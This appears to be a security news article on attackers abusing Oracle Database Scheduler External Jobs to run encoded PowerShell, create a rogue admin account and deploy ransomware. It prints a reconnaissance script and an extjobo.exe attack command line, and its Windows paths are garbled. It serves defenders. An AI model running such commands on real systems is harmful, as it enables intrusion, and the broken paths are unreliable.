Threat Actors Leverage Oracle Database Scheduler to Gain Access to Corporate Environments

In recent weeks, security researchers have observed a surge in attacks exploiting Oracle Database Scheduler’s External Jobs feature to gain a foothold in corporate environments.

This technique abuses the scheduler’s ability to execute arbitrary commands on Windows-based database servers, allowing adversaries to bypass perimeter defenses.

Initial intrusion vectors involve probing publicly exposed Oracle listener ports and leveraging misconfigured credentials or default administrative accounts.

Once connected, attackers can invoke the extjobo.exe component to run commands with the same privileges as the OracleJobScheduler service.

The impact of this technique has been significant. Organizations that segmented their networks and isolated database servers were still compromised due to the inherent trust placed in the database scheduler process.

In one incident, threat actors established encrypted tunnels to external Command & Control (C2) servers, created local administrative accounts, and deployed ransomware under the guise of standard database operations.

Event logs reveal multiple failed login attempts followed by a successful SYSDBA connection, indicating credential harvesting or brute-force tactics preceding command execution.

Yarix analysts noted that, following credential acquisition, the adversaries leveraged Oracle DBS External Jobs to spawn encoded PowerShell processes. This behavior highlights a shift towards living-off-the-land techniques that avoid dropping custom executables on disk.

Instead, the attackers piped Base64-encoded scripts directly into PowerShell via extjobo.exe, complicating detection and evasion of endpoint defenses.

In one case, the attacker executed a command to gather system information before payload download. The decoded script is shown below:

$cpu = Get-CimInstance -ClassName Win32_Processor
$ram = Get-CimInstance -ClassName Win32_ComputerSystem
Write-Host $cpu.Name, $cpu.NumberOfLogicalProcessors, [math]::Round($ram.TotalPhysicalMemory/1GB,2)
Get-PSDrive -PSProvider FileSystem
Get-WmiObject -Class Win32_OperatingSystem | Select-String 'OS Name'
Get-ItemProperty -Path HKLM:Server-Tcp -Name PortNumber

Infection Mechanism via External Jobs

The Oracle Database Scheduler’s External Jobs feature was designed to allow database administrators to run operating-system commands for maintenance tasks.

However, threat actors have discovered that any user with scheduler privileges can connect to the named pipe used by extjobo.exe and inject malicious commands. In the observed attacks, adversaries first authenticated as SYSDBA, then invoked:

extjobo.exe -noservice -exec C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -EncodedCommand JABjAD0AbgBl…

This invocation bypasses script execution policies (-ep Bypass) and injects Base64-encoded payloads directly into memory.

The scheduler listens on a pipe—typically accessible to the ORACLEDBS service account—granting command execution without spawning new processes detectable by conventional monitoring tools.

Following initial reconnaissance, the attackers used similar commands to download secondary payloads from C2 servers, establish reverse shells, and create a local account named Admine for persistence and lateral movement.

By abusing legitimate scheduler functionality, the adversaries avoid writing executable artifacts to disk and rely on native Windows tools for reconnaissance, payload staging, and tunneling.

Logs confirm that after each execution instance, the attackers deleted temporary batch files and scheduler tasks, further hindering forensic analysis.

This technique underscores the need for tighter access controls on scheduler privileges, vigilant monitoring of named-pipe activity, and anomaly detection for unusual extjobo.exe invocations in Oracle database environments.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.